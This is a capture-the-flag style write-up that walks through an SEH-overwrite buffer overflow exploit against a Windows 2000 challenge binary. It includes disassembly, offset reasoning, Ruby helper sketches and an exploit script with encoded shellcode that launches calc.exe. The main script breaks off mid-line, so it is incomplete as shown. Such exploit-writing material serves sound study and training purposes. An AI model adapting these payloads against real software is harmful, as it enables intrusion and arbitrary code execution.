Advanced Windows Buffer Overflows: Take #2
This time around we will take a look at the second of VRT's AWBO challenges. Let's go straight for it by looking at the disassembly dump:
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 1036
.text:00401009 push ebx
.text:0040100A push esi
.text:0040100B push edi
.text:0040100C mov eax, endSequence
.text:00401011 mov [ebp+Buf1], eax ; Buf1 = "\x00\x0a\x0d\x20"
.text:00401014 mov cl, byte_406034
.text:0040101A mov [ebp+var_4], cl
.text:0040101D int 3 ; Trap to Debugger
.text:0040101E lea edx, [ebp+Buffer]
.text:00401024 mov [ebp+var_C], edx
.text:00401027 lea eax, [ebp+Buffer]
.text:0040102D push eax ; Buffer
.text:0040102E call _gets
.text:00401033 add esp, 4
.text:00401036 mov ecx, [ebp+var_C]
.text:00401039 push ecx
.text:0040103A push offset Format ; "You sent me: %s"
.text:0040103F call _printf
.text:00401044 add esp, 8
.text:00401047 push 4 ; Size
.text:00401049 push offset nil_r_n_space ; Buf2
.text:0040104E lea edx, [ebp+Buf1]
.text:00401051 push edx ; Buf1
.text:00401052 call _memcmp
.text:00401057 add esp, 0Ch
.text:0040105A test eax, eax
.text:0040105C jz short loc_40107C
.text:0040105E push offset aFail_ ; "Fail.\n"
.text:00401063 call _printf
.text:00401068 add esp, 4
.text:0040106B push 4 ; Size
.text:0040106D push offset aAaaa ; "AAAA"
.text:00401072 push 0 ; Dst
.text:00401074 call _memcpy
.text:00401079 add esp, 0Ch
.text:0040107C
.text:0040107C loc_40107C: ; CODE XREF: _main+5Cj
.text:0040107C xor eax, eax
.text:0040107E pop edi
.text:0040107F pop esi
.text:00401080 pop ebx
.text:00401081 mov esp, ebp
.text:00401083 pop ebp
.text:00401084 retn
.text:00401084 _main endp
In essence, what we have here is a simple program that uses C's gets() function to receive input from the user. The obvious attack vector is to overwrite some information on the stack. Unfortunately, this function places a custom cookie on the stack consisting of the 4-byte sequence 0x00 0x20 0x0a 0x0d. Because gets() stops reading at the first newline (0x0a), we have no way of writing that sequence back from our input. It's clear, then, that we can't overwrite the return address in the traditional sense: right before the function returns, a check verifies that the cookie still holds this very value, and if the check fails, the program attempts an impossible memcpy into address 0x00000000, which causes an exception.
Speaking of impossible paths and exceptions, the only choice we have is to go after the exception handler. Since the system we're playing with is Windows 2000, we have a very easy platform where we can abuse the Structured Exception Handler (SEH from now on). Like we did last time, we will use Metasploit's pattern generating tools to analyze the stack and see where the SEH structure is located. Research shows that the EXCEPTION_REGISTRATION structure is located 1084 bytes after the beginning of our input. Let's remind ourselves what this structure looks like on the stack.
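The offset search mentioned above can be sketched in a few lines of Ruby. This is only a minimal stand-in for the idea behind Metasploit's pattern tools, not their actual implementation: the names pattern_create and pattern_offset are simply borrowed for the sketch, and the "debugger value" is simulated by reading the pattern back at offset 1084.

```ruby
# Minimal cyclic pattern in the spirit of Metasploit's pattern tools
# (an independent sketch, NOT their code). Each 3-character chunk
# "Aa0", "Aa1", ... is unique, so a 4-byte window pins down its offset.
def pattern_create(length)
  out = +""
  ("A".."Z").each do |upper|
    ("a".."z").each do |lower|
      ("0".."9").each do |digit|
        out << upper << lower << digit
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Given a 32-bit value read from a register or stack slot, find where
# those four bytes sit in the pattern (little-endian, as on x86).
def pattern_offset(value, length)
  needle = [value].pack("V")
  pattern_create(length).index(needle)
end

pattern = pattern_create(1200)

# Simulated debugger reading: the four pattern bytes that ended up at
# the start of the EXCEPTION_REGISTRATION record.
seen = pattern[1084, 4].unpack1("V")
puts pattern_offset(seen, 1200)
```

Feeding the program the pattern instead of real input and reading the overwritten field in the debugger gives the value to pass to pattern_offset.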
The structure contains two members: the first is a pointer to the next EXCEPTION_REGISTRATION structure (remember that exceptions are chained across stack frames) and the second is the Exception Handler itself. As we're using Windows 2000, the ebx register always points to the current frame's EXCEPTION_REGISTRATION structure. We will use this to our advantage and overwrite the handler with the address of a 'jmp ebx' instruction, redirecting execution to the beginning of the EXCEPTION_REGISTRATION structure.
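To make the two-member layout concrete, here is a rough Ruby sketch of the record as it looks once we have overwritten it. The ExceptionRegistration name, the to_bytes helper and above all JMP_EBX_ADDR are assumptions made for illustration; the address is a placeholder, not a real 'jmp ebx' location.

```ruby
# EXCEPTION_REGISTRATION on 32-bit Windows: two little-endian DWORDs.
#   +0  next     pointer to the next record in the chain
#   +4  handler  pointer to the exception handler function
ExceptionRegistration = Struct.new(:next_record, :handler) do
  # Serialize the record the way it sits on the stack.
  def to_bytes
    [next_record, handler].pack("V2")
  end
end

# HYPOTHETICAL address of a 'jmp ebx' instruction; placeholder only.
JMP_EBX_ADDR = 0x41424344

# The 'next' field is reused as four bytes of code, since the text
# above has ebx pointing at the start of the record.
next_as_code = "\xCC\xEB\x10\xCC".b.unpack1("V")

record = ExceptionRegistration.new(next_as_code, JMP_EBX_ADDR)
bytes  = record.to_bytes
puts bytes.unpack1("H*")
```

The first four bytes come out exactly as written in the 'next' field, and the handler address follows in little-endian byte order.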
Since we're going to abuse the exception handling right away in our own stack frame, we don't need to care about the pointer to the next EXCEPTION_REGISTRATION structure. Therefore, we will place a small piece of code at the beginning of the structure, so that once execution comes back after the 'jmp ebx' instruction, we jump over the bytes holding the address of the 'jmp ebx' instruction and land where our first stage shellcode is waiting. From then on we have full control of the execution, and we can place whatever code we want to run after our 'tweaked' EXCEPTION_REGISTRATION structure. Unfortunately, there's very little stack space left, because this is a one-stack-frame program. What we will do in this case is place some special assembly that sends us back to the beginning of our user input, where we have more than a thousand free bytes, which should be enough for a PoC shellcode. All this considered, this is the layout of our exploit input:
| NOP sled | Shellcode | jump-over-struct | ret_addr | stage1
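The layout above can be turned into concrete offsets with a little arithmetic. The sketch below assumes the NOP sled and the shellcode together fill exactly the 1084 bytes before the record, and it takes the 304-byte payload size and the 26-byte stage1 size (eight 3-byte decrements plus a 2-byte jump) from the exploit script; the constant names are made up for the example.

```ruby
RECORD_OFFSET  = 1084  # offset of EXCEPTION_REGISTRATION (from the text)
SHELLCODE_SIZE = 304   # payload size (from the shellcode's header comment)

# Each entry is [name, size in bytes], in the order they are sent.
layout = [
  ["NOP sled",         RECORD_OFFSET - SHELLCODE_SIZE],
  ["Shellcode",        SHELLCODE_SIZE],
  ["jump-over-struct", 4],   # overwrites the 'next' pointer
  ["ret_addr",         4],   # overwrites the handler pointer
  ["stage1",           26],  # 8 * 3-byte decrement + 2-byte jump
]

offsets = {}
offset  = 0
layout.each do |name, size|
  offsets[name] = offset
  printf("%-17s offset %4d  size %4d\n", name, offset, size)
  offset += size
end
```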
Since ebx points to the EXCEPTION_REGISTRATION structure and our user input sits just before it, we will decrement ebx repeatedly until it points into our input. The operand of each of these decrement instructions must be less than or equal to 0x7F, because otherwise we would need a full 4-byte operand, and that would add null bytes to our shellcode, which we don't want. This is the exploit code in Ruby:
#!/usr/bin/env ruby
# windows/exec - 304 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=process, CMD=calc.exe
shellcode = "\x89\xe0\xdd\xc5\xd9\x70\xf4\x5e\x56\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x50\x44\x45\x50\x43\x30" +
"\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55" +
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b" +
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" +
"\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4d\x49\x4e\x4c" +
"\x4b\x34\x49\x50\x44\x34\x43\x37\x49\x51\x48\x4a\x44\x4d" +
"\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x46\x34\x51\x34" +
"\x43\x34\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x46\x44\x43\x31" +
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" +
"\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31" +
"\x4a\x4b\x4d\x59\x51\x4c\x51\x34\x45\x54\x48\x43\x51\x4f" +
"\x46\x51\x4c\x36\x43\x50\x46\x36\x43\x54\x4c\x4b\x47\x36" +
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" +
"\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4b\x33" +
"\x49\x50\x42\x4a\x46\x30\x42\x48\x43\x4e\x49\x48\x4b\x52" +
"\x42\x53\x42\x48\x4c\x58\x4b\x4e\x4c\x4a\x44\x4e\x50\x57" +
"\x4b\x4f\x4b\x57\x43\x53\x43\x51\x42\x4c\x42\x43\x46\x4e" +
"\x42\x45\x42\x58\x45\x35\x43\x30\x41\x41"
# jump over Handler overwrite
jump = "\xCC\xEB\x10\xCC"
# decrement ebx to point to our shellcode and jump to it
stage1 = "\x83\xEB\x7F"*8+"\xFF\xE3"
# put it all together and print it
puts ("\x90"*(1084-shellcode.length))<
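As a sanity check on stage1, the decrement arithmetic can be worked out separately. The sketch below assumes, as the text does, that ebx points at the record at input offset 1084 when stage1 runs; sub_ebx_imm8 is a hypothetical helper written for this example, not part of any library.

```ruby
# 'sub ebx, imm8' assembles to 83 EB ib. The imm8 is sign-extended, so
# the largest positive step is 0x7F; anything bigger needs the imm32
# form (81 EB id), whose upper bytes are zero for small values.
def sub_ebx_imm8(step)
  raise ArgumentError, "imm8 must be 1..0x7F" unless (1..0x7F).cover?(step)
  [0x83, 0xEB, step].pack("C3")
end

JMP_EBX = "\xFF\xE3".b  # jmp ebx

stage1 = sub_ebx_imm8(0x7F) * 8 + JMP_EBX

record_offset = 1084                  # from the text
rewind        = 0x7F * 8              # 1016 bytes in total
landing       = record_offset - rewind
sled_length   = record_offset - 304   # 780 bytes of NOPs

puts "stage1 bytes: #{stage1.unpack1('H*')}"
puts "ebx lands at input offset #{landing}, inside the sled: #{landing < sled_length}"
```

Eight decrements of 0x7F move ebx back 1016 bytes, which is well inside the NOP sled under these assumptions, so the final jump slides into the shellcode.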
The shellcode uses WinExec() to execute calc.exe. Since this is quite a small program that runs very fast, and WinExec() is an asynchronous call, the API doesn't have enough time to actually finish executing the call; hence, the exploit only works in a debugger environment, running step by step (to give the API call enough time). The basic workaround for this is to include a call to Sleep() in the shellcode, but since these shellcodes are quite optimized, editing or tweaking them is quite a pain in the ass. My basic objective for this challenge was to make it run arbitrary code, and that's clearly done. Also, I've recently got a copy of the flamboyant new edition of Windows Internals and I'm quite eager to dive into it.
Credits go to Ruben Santamarta for pointing out the WinExec issue. See you around!